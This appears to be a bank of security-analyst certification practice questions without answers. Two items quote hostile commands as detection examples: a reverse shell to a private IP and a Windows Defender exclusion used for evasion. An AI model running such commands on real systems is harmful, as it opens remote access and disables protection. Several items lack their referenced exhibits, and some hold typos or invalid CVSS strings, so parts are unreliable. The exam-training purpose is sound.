An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?

A. DKIM

B. SPF

C. SMTP

D. DMARC

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

A. Deploy agents on all systems to perform the scans

B. Deploy a central scanner and perform non-credentialed scans

C. Deploy a cloud-based scanner and perform a network scan

D. Deploy a scanner sensor on every segment and perform credentialed scans

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

A. function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }

B. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }

C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }

D. function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

An analyst investigated a website and produced the following:
 
Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?

A. nmap -sS -T4 -F insecure.org

B. nmap -C insecure.org

C. nmap -sV -T4 -F insecure.org

D. nmap -A insecure.org

A security analyst is reviewing the findings of the latest vulnerability report for a company’s web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

A. Deploy a WAF to the front of the application.

B. Replace the current MD5 with SHA-256.

C. Deploy an antivirus application on the hosting system.

D. Replace the MD5 with digital signatures.

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?

A. Impact

B. Vulnerability score

C. Mean time to detect

D. Isolation

Which of the following best describes the goal of a tabletop exercise?

A. To test possible incident scenarios and how to react properly

B. To perform attack exercises to check response effectiveness

C. To understand existing threat actors and how to replicate their techniques

D. To check the effectiveness of the business continuity plan

A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls and two-factor authentication. Which of the following does this most likely describe?

A. System hardening

B. Hybrid network architecture

C. Continuous authorization

D. Secure access service edge

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?

A. RCE

B. Reverse shell

C. XSS

D. SQL injection

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?

A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L

B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L

C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H

D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

A. Scope

B. Weaponization

C. CVSS

D. Asset value

An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst's investigation?

A. OpenVAS

B. Angry IP Scanner

C. Wireshark

D. Maltego

A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?

A. Running regular penetration tests to identify and address new vulnerabilities.

B. Conducting regular security awareness training of employees to prevent social engineering attacks.

C. Deploying an additional layer of access controls to verify authorized individuals.

D. Implementing intrusion detection software to alert security teams of unauthorized access attempts

A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?

A. High GPU utilization

B. Bandwidth consumption

C. Unauthorized changes

D. Unusual traffic spikes

A penetration tester is conducting a test on an organization's software development website. The penetration tester sends the following request to the web interface:
 
Which of the following exploits is most likely being attempted?

A. SQL injection

B. Local file inclusion

C. Cross-site scripting

D. Directory traversal

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

A. External

B. Agent-based

C. Non-credentialed

D. Credentialed

Which of the following best describes the process of requiring remediation of a known threat within a given time frame?

A. SLA

B. MOU

C. Best-effort patching

D. Organizational governance

An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the control was unable to detect an attack with nine failed logins. Which of the following best represents what occurred?

A. False positive

B. True negative

C. False negative

D. True positive

A security analyst reviews the following extract of a vulnerability scan that was performed against the web server:
 
Which of the following recommendations should the security analyst provide to harden the web server?

A. Remove the version information on http-server-header.

B. Disable tcp_wrappers.

C. Delete the /wp-login.php folder.

D. Close port 22.

The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?

A. Deploy a CASB and enable policy enforcement

B. Configure MFA with strict access

C. Deploy an API gateway

D. Enable SSO to the cloud applications

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?

A. MITRE ATT&CK

B. Cyber Kill Cham

C. OWASP

D. STIX/TAXII

An employee downloads a freeware program to change the desktop to the classic look of legacy Windows. Shortly after the employee installs the program, a high volume of random DNS queries begin to originate from the system. An investigation on the system reveals the following:
Add-MpPreference –ExclusionPath ‘%Program Files%ksyconfig’
Which of the following is possibly occurring?

A. Persistence

B. Privilege escalation

C. Credential harvesting

D. Defense evasion

An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R
Which of the following represents the exploit code maturity of this critical vulnerability?

A. E:U

B. S:C

C. RC:R

D. AV:N

E. AC:L

A cybersecurity analyst is recording the following details:
•	ID
•	Name
•	Description
•	Classification of information
•	Responsible party
In which of the following documents is the analyst recording this information?

A. Risk register

B. Change control documentation

C. Incident response playbook

D. Incident response plan

A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project:
•	Must use minimal network bandwidth
•	Must use minimal host resources
•	Must provide accurate, near real-time updates
•	Must not have any stored credentials in configuration on the scanner
Which of the following vulnerability scanning methods should be used to best meet these requirements?

A. Internal

B. Agent

C. Active

D. Uncredentialed

An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?

A. CIS Benchmarks

B. PCI DSS

C. OWASP Top Ten

D. ISO 27001

Which of the following is the first step that should be performed when establishing a disaster recovery plan?

A. Agree on the goals and objectives of the plan

B. Determine the site to be used during a disaster

C. Demonstrate adherence to a standard disaster recovery process

D. Identify applications to be run during a disaster

An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has allowed the attacker to prioritize possible next targets. Which of the following is this an example of?

A. Passive network footprinting

B. OS fingerprinting

C. Service port identification

D. Application versioning

Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?

A. Enrich the SIEM-ingested data to include all data required for triage

B. Schedule a task to disable alerting when vulnerability scans are executing

C. Filter all alarms in the SIEM with low seventy

D. Add a SOAR rule to drop irrelevant and duplicated notifications

A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:
 
Which of the following should be completed first to remediate the findings?

A. Ask the web development team to update the page contents

B. Add the IP address allow listing for control panel access

C. Purchase an appropriate certificate from a trusted root CA

D. Perform proper sanitization on all fields

A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?

A. Credentialed scar

B. External scan

C. Differential scan

D. Network scan

A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. Which of the following would best address this issue?

A. Increasing training and awareness for all staff

B. Ensuring that malicious websites cannot be visited

C. Blocking all scripts downloaded from the internet

D. Disabling all staff members’ ability to run downloaded applications

A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly? (Choose two.)

A. Hostname

B. Missing KPI

C. CVE details

D. POC availabilty

E. IoCs

F. npm identifier

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?

A. Risk register

B. Vulnerability assessment

C. Penetration test

D. Compliance report

Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?

A. Review of security requirements

B. Compliance checks

C. Decomposing the application

D. Security by design

An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy and firewall. Upon further investigation, it appears that the proxy and firewall rules that were in place were removed by a service account that is not recognized. Which of the following parts of the Cyber Kill Chain does this describe?

A. Delivery

B. Command and control

C. Reconnaissance

D. Weaponization

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

A. To provide metrics and test continuity controls

B. To verify the roles of the incident response team

C. To provide recommendations for handling vulnerabilities

D. To perform tests against implemented security controls

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?

A. The NTP server is not configured on the host

B. The cybersecurity analyst is looking at the wrong information

C. The firewall is using UTC time

D. The host with the logs is offline

A vulnerability scanner generates the following output:
 
The company has an SLA for patching that requires time frames to be met for high-risk vulnerabilities. Which of the following should the analyst prioritize first for remediation?

A. Oracle JDK

B. Cisco Webex

C. Redis Server

D. SSL Self-signed Certificate

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

A. Nmap

B. TCPDump

C. SIEM

D. EDR

An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?

A. RFI

B. LFI

C. CSRF

D. XSS

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?

A. Beaconing

B. Cross-site scripting

C. Buffer overflow

D. PHP traversal

A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:
 
Which of the following vulnerability types is the security analyst validating?

A. Directory traversal

B. XSS

C. XXE

D. SSRF

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

A. Avoid

B. Transfer

C. Accept

D. Mitigate

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?

A. Data enrichment

B. Security control plane

C. Threat feed combination

D. Single pane of glass

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

A. Firewall logs

B. Indicators of compromise

C. Risk assessment

D. Access control lists

A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?

A. Help desk

B. Law enforcement

C. Legal department

D. Board member

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?

A. Take a snapshot of the compromised server and verify its integrity

B. Restore the affected server to remove any malware

C. Contact the appropriate government agency to investigate

D. Research the malware strain to perform attribution

Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system application, or user base is affected by an uptime availability outage?

A. Timeline

B. Evidence

C. Impact

D. Scope

After completing a review of network activity, the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring?

A. Irregular peer-to-peer communication

B. Rogue device on the network

C. Abnormal OS process behavior

D. Data exfiltration